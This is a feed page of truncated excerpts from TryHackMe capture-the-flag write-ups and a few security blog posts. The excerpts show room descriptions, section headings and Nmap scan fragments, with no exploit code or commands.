    Don’t over-bake your pie! Please allow 5 minutes for this instance to fully deploy before attacking. This VM was developed in collaboration with @ch4rm, thanks to him for the foothold and privilege escalation ideas. Contents 1 User Flag 1.1 Services 1.2 Django application 1.3 Pickle in the search 1.4 Exploit 1.5 Evade docker 1.6 Database 1.7 Brute force ramsey’s SSH account 1.8 Ramsey’s flag 2 Root Flag 2.1 Lateral move (ramsey -> oliver) 2.2 Privilege escalation User Flag Services Running Nmap will only reveal 1 open port: PORT STATE SERVICE VERSION 5003/tcp open filemaker? | fingerprint-strings: | GetRequest: | HTTP/1.1 200 OK | Date: Sat, 05 Jun 2021 05:28:13 GMT | Server: WSGIServer/0.2 CPython/3.8.6…

    TryHackMe > Cooctus Stories
    This room is about the Cooctus Clan. Previously on Cooctus Tracker Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened. (From Overpass 2 - Hacked by NinjaJc01) Present times Further investigation revealed that the hack was made possible by the help of an insider threat. Paradox helped the Cooctus Clan hack overpass in exchange for the secret shiba stash. Now, we have discovered a private server deep down under the boiling hot sands of the Saharan Desert. We suspect it is operated by the Clan and it’s your objective to uncover their plans. Note: A stable shell is recommended, so try and SSH into users when possible. Con…
    TryHackMe > VulnNet Roasted
    VulnNet Entertainment quickly deployed another management instance on their very broad network… VulnNet Entertainment just deployed a new instance on their network with the newly-hired system administrators. Being a security-aware company, they as always hired you to perform a penetration test, and see how system administrators are performing. Difficulty: Easy Operating System: Windows This is a much simpler machine, do not overthink. You can do it by following common methodologies. Note: It might take up to 6 minutes for this machine to fully boot. Author: TheCyb3rW0lf Discord: TheCyb3rW0lf#8594 Icon made by DinosoftLabs from www.flaticon.com Contents 1 What is the user flag? (Desktop.txt) 1.1 Services 1.2 Samba 1.3 Find users 1.4 Find users without K…

    TryHackMe > VulnNet Internal
    VulnNet Entertainment learns from its mistakes, and now they have something new for you… VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings. Difficulty: Easy/Medium Operating System: Linux This machine was designed to be quite the opposite of the previous machines in this series and it focuses on internal services. It’s supposed to show you how you can retrieve interesting information and use it to gain system access. Report your findings by submitting the correct flags. Note: It might take …

    TryHackMe > toc2
    It’s a setup... Can you get the flags in time? I have a theory that the truth is never told during the nine-to-five hours. - Hunter S. Thompson Contents 1 Find and retrieve the user.txt flag 1.1 Services 1.2 CMS information 1.3 CMS Made Simple / Reverse Shell 1.4 User flag 2 Escalate your privileges and acquire root.txt 2.1 Lateral move (www-data -> frank) 2.2 The readcreds binary 2.3 Race condition 2.4 Root flag Find and retrieve the user.txt flag Services Nmap reveals 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 84:4e:b1:49:31:22:94:84:83:97:91:72:cb:23:33:36 (RSA) | 256 cc:32:19:3f:f5:b9:a4:d5:ac:32:0f:6e:f0:83:35:71 (ECDSA) …

    TryHackMe > The Marketplace
    Can you take over The Marketplace’s infrastructure? The sysadmin of The Marketplace, Michael, has given you access to an internal server of his, so you can pentest the marketplace platform he and his team have been working on. He said it still has a few bugs he and his team need to iron out. Can you take advantage of this and will you be able to gain root access on his server? Contents 1 What is flag 1? 1.1 Services 1.2 Web application 1.3 Token cookie 1.4 XSS vulnerability 1.5 Stealing the admin cookie 2 What is flag 2? (User.txt) 2.1 SQLi vulnerability 2.2 Exploit the SQL injection 2.2.1 Database and tables 2.2.2 Users table 2.2.3 Messages table 2.3 Connect as jake 3 What is flag 3? (Root.txt) 3.1 Lateral move (jake -> michael) 3.…

    FAQ: Difference between vulnerability, exploit and CVE
    Obligatory FAQ note: Sometimes I get asked questions, e.g. on IRC, via e-mail or during my livestreams. And sometimes I get asked the same question repeatedly. To save myself some time (*cough* and be able to give the same answer instead of conflicting ones *cough*) I decided to write up selected question and answer pairs in separate blog posts. Please remember that these answers are by no means authoritative - they are limited by my experience, my knowledge and my opinions on things. Do look in the comment section as well - a lot of smart people read my blog and might have a different, and likely better, answer to the same question. If you disagree or just have something to add - by all means, please do comment. Q: How to find exploits in software? Q: How did you find this CVE? (in …

    TryHackMe > Debug
    Linux Machine CTF! You’ll learn about enumeration, finding hidden password files and how to exploit php deserialization! Contents 1 User flag 1.1 Open ports 1.2 Web enumeration 1.3 The index.php.bak file 1.4 PHP serialization exploit 1.5 James password 1.6 User flag 2 Root flag 2.1 Message from root 2.2 The motd service 2.3 Reverse shell and root flag User flag Open ports Nmap reveals 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA) | 256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA) |_ 256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519) 80/tcp open http …

    VMware Workspace One and Flexera Address Software Vulnerabilities
    Keeping ahead of software vulnerabilities is a tough task. No matter the organization, industry, location or experience, vulnerable applications pop up all over the place all the time. The SolarWinds breach in late 2020 or the ransomware attack that closed down the Colonial Pipeline supplying nearly half the gasoline to the East Coast are just a couple of recent major examples of the effects of a breach, but they’re just waiting to happen every day. Luckily for all of us in the information technology industry, there are plenty of amazing hackers and security experts on the side of stopping these…

    TryHackMe > En-pass
    Get what you can’t. Think-out-of-the-box Contents 1 Name The Path. 1.1 Enumeration (1st level) 1.2 The zip directory 1.3 The web directory 2 What is the user flag? 2.1 SSH private key 2.2 The reg.php page 2.3 403 Fuzzing 2.4 SSH Connection 3 What is the root flag? 3.1 Cronjob 3.2 The script 3.3 Exploit 3.4 Root shell Name The Path. Nmap detects 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8a:bf:6b:1e:93:71:7c:99:04:59:d3:8d:81:04:af:46 (RSA) | 256 40:fd:0c:fc:0b:a8:f5:2d:b1:2e:34:81:e5:c7:a5:91 (ECDSA) |_ 256 7b:39:97:f0:6c:8a:ba:38:5f:48:7b:cc:da:72:a8:44 (ED25519) 8001/tcp open http Apache httpd 2.4.18 ((…

    TryHackMe > Wekor
    CTF challenge involving SQLi, WordPress, vhost enumeration and recognizing internal services ;) Hey Everyone! This Box is just a little CTF I’ve prepared recently. I hope you enjoy it as it is my first time ever creating something like this! This CTF is focused primarily on enumeration, better understanding of services and thinking out of the box for some parts of this machine. Feel free to ask any questions…It’s okay to be confused in some parts of the box ;) Just a quick note, Please use the domain wekor.thm as it could be useful later on in the box ;) Contents 1 User flag 1.1 Nmap scan 1.2 Robots.txt 1.3 SQL Injection 1.4 Wordpress credentials 1.5 Wordpress 1.6 Reverse Shell 1.7 Lateral move (www-data -> Orka) 1.8 User flag 2 Root flag 2.1 O…

    TryHackMe > Bookstore
    A Beginner level box with basic web enumeration and REST API Fuzzing. Contents 1 User flag 1.1 Port 80 1.2 Port 5000 1.3 Fuzzing the API (v1) 1.4 User flag 2 Root flag 2.1 Console 2.2 Reverse Engineering (try-harder) 2.3 Root shell User flag Nmap discovers 3 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 44:0e:60:ab:1e:86:5b:44:28:51:db:3f:9b:12:21:77 (RSA) | 256 59:2f:70:76:9f:65:ab:dc:0c:7d:c1:a2:a3:4d:e6:40 (ECDSA) |_ 256 10:9f:0b:dd:d6:4d:c7:7a:3d:ff:52:42:1d:29:6e:ba (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Book Store 5000/tcp open http Wer…
2022-08-17T02:24:45.203Z osmosfeed 1.15.1